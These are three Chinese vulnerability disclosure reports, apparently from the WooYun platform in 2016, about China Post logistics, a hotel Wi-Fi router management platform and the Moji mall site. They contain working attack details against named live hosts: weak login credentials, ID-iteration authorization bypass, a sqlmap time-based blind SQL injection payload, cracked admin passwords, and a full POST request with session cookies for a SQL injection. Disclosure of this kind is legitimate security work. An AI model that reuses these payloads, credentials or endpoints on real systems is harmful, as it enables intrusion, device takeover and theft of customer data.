漏洞详情披露状态： 2016-04-24： 细节已通知厂商并且等待厂商处理中2016-04-24： 厂商已经确认，细节仅向厂商公开2016-05-04： 细节向核心白帽子及相关领域专家公开2016-05-14： 细节向普通白帽子公开2016-05-24： 细节向实习白帽子公开2016-06-08： 细节向公众公开简要描述：11详细说明：中国邮政物流某系统漏洞可Getshell（泄露服务器文件/运单信息/收货地址/客户联系方式大量信息）.地址：http://www.jscpel.com:9090/JSCNPL_TMS_TEST/login.action    漏洞证明：可Getshell（泄露服务器文件/运单信息/收货地址/客户联系方式大量信息）.           修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-04-24 19:41厂商回复：谢谢。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-08： 厂商已经确认，细节仅向厂商公开2016-05-18： 细节向核心白帽子及相关领域专家公开2016-05-28： 细节向普通白帽子公开2016-06-07： 细节向实习白帽子公开2016-06-22： 细节向公众公开简要描述：可重启所有的设备，恢复出厂设置。监听用户的浏览记录。强制下线用户。详细说明：主要是看到了之前机器猫提交的这个漏洞code 区域http://**.**.**.**/bugs/wooyun-2010-0204620很容易复现了，猜测只是简单的弱口令进入后台，然后在设备处越权管理设备。这次多几处越权，及两个sql注入合作伙伴看着都挺牛运营后台code 区域http://**.**.**.**:5118/softac/login.jsp弱口令，test 123456进去之前的那个漏洞应该在于设备列表处越权只需要对id进行遍历就可以对其他非自己的设备进行控制将id改成176成功访问到了唯实酒店的设备，且可进行任何操作这个就是刚才说的监听用户浏览记录的功能，，感觉不太好吧，怎么说我也进了不少wifi站的后台了，这种功能还是第一次见猜测上个漏洞止步于此这里再提几个越权。sql注入还在跑，待会写我们已经知道，test对应的是文津酒店将此处的id改成1，成功越权到了唯实酒店的用户可以强制下线用户，加入黑名单，限速等操作同样的，上网日志，白名单，黑名单，等功能存在相同的越权，这里不一一截图了还有序列号管理，平台日志，都存在同样的越权问题看了下，除了在修改管理员信息时候不能越权修改其他管理员之外，其他功能基本都存在越权接下来是sql注入漏洞在设备查询的请求中的gid存在sql注入漏洞code 区域sqlmap resumed the following injection point(s) from stored session: --- Parameter: gid (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gid=00200002' AND (SELECT * FROM (SELECT(SLEEP(5)))znPC) AND 'HuKC'='HuKC&inputBranch=1&name=111&serialNumber=1&ipAddress=1&hardwareVersion=1&softwareVersion=11 --- back-end DBMS: MySQL 5.0.12 available databases [5]: [*] acside [*] information_schema [*] mysql [*] performance_schema [*] soofacroot权限当前的数据库是soofac读取数据库soofac中的admin_user表admin账户的密码太复杂了，md5没解开，，其他几个解开了延时注入实在太慢了wsds 123456zcgcjq 123456zcgcjq1 123456延时注入太慢了，就不跑有多少设备了，根据之前越权的漏洞，遍历了一下，存在mac的应该就算是存在的路由器，因此差不多有近3000个路由器足够证明危害了。还有一处sql注入存在于数据平台的登陆处code 区域**.**.**.**:9000/bigData/login/index.php?logout当前的数据库为r2有61个管理员，读取出来随便进去漏洞证明：  修复方案：改改改，求交给海淀区信息安全等级保护办公室进行处理。看他们上次给了20个rank。。版权声明：转载请注明来源 千机@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-08 11:16厂商回复：已通知厂商处理最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：RT详细说明： code 区域post注入:sqlmap.py -r 1.txt --dbs -------------post数据包-------------------- POST /myshop/addnewaddress HTTP/1.1 Host: mall.moji.com Proxy-Connection: keep-alive Content-Length: 223 Accept: application/json Origin: http://mall.moji.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644数据库code 区域available databases [1]: [*] mojimall 漏洞证明： code 区域post注入:sqlmap.py -r 1.txt --dbs -------------post数据包-------------------- POST /myshop/addnewaddress HTTP/1.1 Host: mall.moji.com Proxy-Connection: keep-alive Content-Length: 223 Accept: application/json Origin: http://mall.moji.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644数据库code 区域available databases [1]: [*] mojimall 修复方案：过滤版权声明：转载请注明来源 黑色键盘丶@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：6确认时间：2016-04-27 15:52厂商回复：感谢提醒。最新状态：暂无